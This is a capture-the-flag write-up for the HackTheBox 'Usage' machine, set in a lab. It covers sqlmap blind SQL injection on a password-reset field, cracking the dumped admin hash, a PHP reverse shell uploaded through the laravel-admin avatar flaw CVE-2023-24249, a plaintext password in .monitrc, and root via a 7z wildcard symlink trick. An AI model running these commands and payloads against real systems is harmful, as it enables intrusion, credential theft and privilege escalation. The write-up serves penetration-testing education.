Hackthebox: Usage

Overview

Usage is an easy-difficulty HackTheBox machine, dealing with initial SQL Injection compromise leading us to the admin dashboard where we will be abusing encore/laravel-admin v1.8.18 to land a shell on the system, and finally a wildcard abuse in 7z.

Usage-info-card

Reconnaissance

Nmap

Nmap scan report for 10.129.88.136
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a0f8fdd304b807a063dd37dfd7eeca78 (ECDSA)
|_  256 bd22f5287727fb65baf6fd2f10c7828f (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=8/10%OT=22%CT=1%CU=31655%PV=Y%DS=2%DC=T%G=Y%TM=66B734A
OS:B%P=i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54E
OS:ST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W
OS:5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   306.00 ms 10.10.16.1
2   130.00 ms 10.129.88.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.92 seconds

We can see that we have OpenSSH running on port 22, and web application exposed on port 80 utilizing the domain name usage.htb.
So we go forward and add the usage.htb entry to our /etc/hosts file: 10.129.88.136 usage.htb

Web Application - http://usage.htb

Web App Port 80

This seems like a casual web application with login and registration features. We register a casual user and login with it:

User login

But we also that we have an Admin button that redirects us to admin.usage.htb subdomain.

We add that as an entry to our /etc/hosts file and we navigate to it:

Admin subdomain

SQL Injection - http://usage.htb

Since I still did not find anything of interest on the main domain, I just thought of trying to get into it using SQL injection. We have different entrypoints for that such as the login portal and the forgot password portal:

Password Reset

So I just went forward and intercepted the request using Caido:

POST /forget-password HTTP/1.1
Host: usage.htb
Content-Length: 69
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://usage.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.6
Referer: http://usage.htb/forget-password
Accept-Encoding: gzip, deflate
Cookie: XSRF-TOKEN=eyJpdiI6Ik5Md25oSUFWeFM2eEdBWDhRTGdXaXc9PSIsInZhbHVlIjoiUVBneFFtWHhDTGlnbjk0b1F0QkVTbmpUdGVEUXc1eklsc3E4dTN2Q0FaSUE3YUg5ZzA0bW53UE1HenBjVUFFQmgzSWZOSkxvd3NtcDhFaURpTXIyNHNUeFN2WDN3UHoyUFBQeEZrN3BKekQyN0tnRmpTbXAvMkN0WWxpUkRRSUkiLCJtYWMiOiJmYWZmMmFjNDdiNjc5MjEyYTA4NjkwYjdkZDczYzg0YjA2YWQ5MzVmZWVkMjhkNDNkODBiNWRmMjg0ZmM1YTQwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBhOVR1bUJIbVpwZUFoa1BVdkx2dFE9PSIsInZhbHVlIjoiT0ZLSGhHNkRTM3owMjY3RE5mbWF4anU1KzUzYUhwLzFKOE1jYnIwSHpBVWkrQUFhQjFVYXBjZkpWMTdkejFwQUhYQllOaGx3OHFIb2xsRG1XaHdBMlBsL0V6SEdVYWFPQXoxbWpNTDFld3Z3R2YwOFdFczJsb0pweU14ZE5hZDEiLCJtYWMiOiJiNWRhZGNhNzVjZTdlY2NjMDdmZTA1NTBlMTRlMDkxZDM4NDdhYjFlNTgwNTIzNGQxZjVjMjBkZTM4NzUyNTk3IiwidGFnIjoiIn0%3D

_token=DGA8A7rtMhyX8BC5kUKoiO1bn00gMumga5ZKJAlx&email=kujen%40htb.htb

Trying to inject single quotes into the email field, we are presented with a 500 internal server error, which strengthens our thoughts of SQL Injection:

Password Reset

Password Reset

SQL Injection Exploitation - SQLMap

I’ll first intercept the request being made for password reset, and then pass it along to sqlmap to check what we might have. And it is vulnerable!

──(kali㉿kali)-[~/hackthebox/usage]
└─$ sqlmap -r request.txt -p email --level 5 --risk 3 --batch --threads 10 --dbs
<snip>
POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 739 HTTP(s) requests:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: _token=DGA8A7rtMhyX8BC5kUKoiO1bn00gMumga5ZKJAlx&[email protected]' AND 5430=(SELECT (CASE WHEN (5430=5430) THEN 5430 ELSE (SELECT 8123 UNION SELECT 5977) END))-- fWmg

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: _token=DGA8A7rtMhyX8BC5kUKoiO1bn00gMumga5ZKJAlx&[email protected]' AND 6527=BENCHMARK(5000000,MD5(0x7a546b67))-- YvmE
---
[07:08:23] [INFO] the back-end DBMS is MySQL
<snip>

MySQL Exploitation

[07:08:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL < 5.0.12
[07:08:26] [INFO] fetching database names
[07:08:26] [INFO] fetching number of databases
[07:08:26] [INFO] retrieved: 3
[07:08:30] [INFO] retrieving the length of query output
[07:08:30] [INFO] retrieved: 18
[07:08:48] [INFO] retrieved: information_schema             
[07:08:48] [INFO] retrieving the length of query output
[07:08:48] [INFO] retrieved: 18
[07:09:04] [INFO] retrieved: performance_schema             
[07:09:04] [INFO] retrieving the length of query output
[07:09:04] [INFO] retrieved: 10
[07:09:20] [INFO] retrieved: usage_blog             
available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog

We can now proceed to extract more information from the database using SQLMap:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ sqlmap -r request.txt -p email --level 5 --risk 3 --batch --threads 10 -D usage_blog --tables   

And we can see that we now have access to all tables:

Database: usage_blog
[15 tables]
+------------------------+
| admin_menu             |
| admin_operation_log    |
| admin_permissions      |
| admin_role_menu        |
| admin_role_permissions |
| admin_role_users       |
| admin_roles            |
| admin_user_permissions |
| admin_users            |
| blog                   |
| failed_jobs            |
| migrations             |
| password_reset_tokens  |
| personal_access_tokens |
| users                  |
+------------------------+

We now proceed to dumping usernames and password from the admin_users tables:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ sqlmap -r request.txt -p email --level 5 --risk 3 --batch --threads 10 -D usage_blog -T admin_users -C username,password --dump   
<snip>
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+
<snip>

We then crack the hash using rockyou.txt and get our password:

┌──(kali㉿kali)-[~/hackthebox/usage]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1        (?)
1g 0:00:00:07 DONE (2024-08-10 07:22) 0.1319g/s 213.7p/s 213.7c/s 213.7C/s alexis1..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We can now login into the admin dashboard:

Admin Dashboard

Admin Dashboard

CVE-2023-24249

Looking at the dashboard, we can see dependencies used by the web application. Looking for potential exploits on them we find an interesting File Upload Vulnerability related to encore/laravel-admin v1.8.18:
https://www.cvedetails.com/cve/CVE-2023-24249

We can then craft our own PHP reverse shell, navigate to the avatar upload feature and intercept it to change the extension since Only "image" files are supported. So we upload our php script with the extension of .php.jpg and change it to .php.jpg.php upon intercepting it:

POST /admin/auth/setting HTTP/1.1
Host: admin.usage.htb
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-PJAX: true
X-PJAX-Container: #pjax-container
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuz2YtHsN2jWvAETB
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.6
Origin: http://admin.usage.htb
Referer: http://admin.usage.htb/admin/auth/setting
Accept-Encoding: gzip, deflate
Cookie: remember_admin_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjlNNHhoTGc0WUpRY3pqSE9iZWdOYkE9PSIsInZhbHVlIjoiRXRpU2xlaEE2dE42Qkk0VEFOblN0cFU1R1JFa2R5b1RVbEtVenVHdHFNL0Z3RE84ci9hOHFTM2RYVzdIYmU5SVp3d1cwVUVVUzNrZXBEazBCdTl3Q00vRzdqeW15bnNEeTZCMnVaaWwyWmJXdVREODN6dnNhNGMrZWd3dHJ5UlkvTVhWc1RoelcxUlFNQ0ZrQTZVRGsxSm5NaHlBaGUrb3cvdFR1OHNDZTFVcFUwbEVoUFF3NVRsbGFoYzA5VUlYMjRyRUV6dFc1UVRkVFVoZjNkTXFXVlhTZmdvK1RrdGhjc3VQSFE4ek45Yz0iLCJtYWMiOiJkOTFkMTEzOWNmMDIwYmY0MGZhMjFiNzZhOGEwMzFlMmVhNDM4N2NhMTlkYjNkOWFjYzg4ZjlmN2I3OTA5NDMxIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InJmSmVUcGFqSkprcDBWdVo1SUhHaEE9PSIsInZhbHVlIjoiSzZtWCtCOWwwSDQ2Q09UZ00zQ0xiT0FaQnJpeGxQcWduOWlUa1d5akMwaE9qYXZVVjJjQ052d3ByWXlWSExOR3lubFphTmNXNTdNb0hyYzQrMDhDS2NCek9qOGVPenJkR2hPcWQxRWg2NkpwbjAxVGl0ZVdESVczR1ZVckdFK0IiLCJtYWMiOiI2OGNkMmQyMGFlNjI3NjIzNWFhMGZkMjQzZjAxMTk1NGFkOTU2Y2MyZDViZmRlMWZmNjM1YzAxZDcyZTk2ZjVjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNFSm1RV016ZzlOQ09NK2ZlZFY2Q0E9PSIsInZhbHVlIjoiYmR2c25NYktILzh6Mm5YK0tsRmdnOHI4UUl6SWZHQkg3Qjc3QUxBUlEwQ1Q3VEJ0Z1BkT1lKekdDR3ZzVHMrcjJqTTJXWUVXSUt0NCtES3E1bmJOb2ErdVluRm1Sc3g2dExFM1liaTJaN3BFS25hdXh4S0VZejJqN3BSOVpSZFIiLCJtYWMiOiJlNmEyZGJhMTQ3NDM3OTYxZmY1YjgxMmJkODBkMWVkZGI3ZTBkYTljMzQ4MjMwNjVhMWQ4NWI0Y2IwZTlhNTkxIiwidGFnIjoiIn0%3D
Content-Length: 6014

------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="name"

Administrator
------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="avatar"; filename="pwn.php.jpg.php"
Content-Type: image/jpeg

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
<snip>>




------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="_token"

T8a0DDopYjOldX8ts4OL44lDC2A1ha1GCUS4z7dq
------WebKitFormBoundaryuz2YtHsN2jWvAETB
Content-Disposition: form-data; name="_method"

PUT
------WebKitFormBoundaryuz2YtHsN2jWvAETB--

And we get our reverse shell:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.88.136] 38682
Linux usage 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 11:49:57 up  2:17,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(dash) gid=1000(dash) groups=1000(dash)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)

And we get our user flag:

$ cat /home/dash/user.txt
ebb49d21c12cb5******************

Privilege Escalation to root

Pivoting from dash to xander

Looking thoroughly in the user home folder, we find a hidden .monitrc file with credentials to the user xander:

dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
    if cpu > 80% for 2 cycles then alert


#System Monitoring
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
        if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert

check filesystem rootfs with path /
       if space usage > 80% then alert
dash@usage:~$

Xander to root

Checking what xander can run as sudo we find something interesting:

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management
xander@usage:~$

Performing a simple strings command on the /usr/bin/usage_management binary, I find this interesting command:

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

Which is what I believe to be running under the hood when running the binary:

xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor                 (A00F11),ASM,AES-NI)

Scanning the drive:
2984 folders, 17946 files, 113879190 bytes (109 MiB)

Creating archive: /var/backups/project.zip

Items to compress: 20930


Files read from disk: 17946
Archive size: 54830173 bytes (53 MiB)
Everything is Ok

Doing some research, I find this interesting article from https://book.hacktricks.xyz/: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks

We can create files in the folder where this is being executed, we could create the file @root.txt and the file root.txt being a symlink to the file we want to read and we get our root flag:

xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7763 64-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54830315

Scanning the drive:

WARNING: No more files
877179f45367f9******************

2984 folders, 17947 files, 113879223 bytes (109 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 20931


Files read from disk: 17947
Archive size: 54830315 bytes (53 MiB)

Scan WARNINGS for files and folders:

877179f45367f9****************** : No more files
----------------
Scan WARNINGS: 1
xander@usage:/var/www/html$

And the root flag is 877179f45367f9******************

Thank you for reading! Hope you enjoyed it.
-0xkujen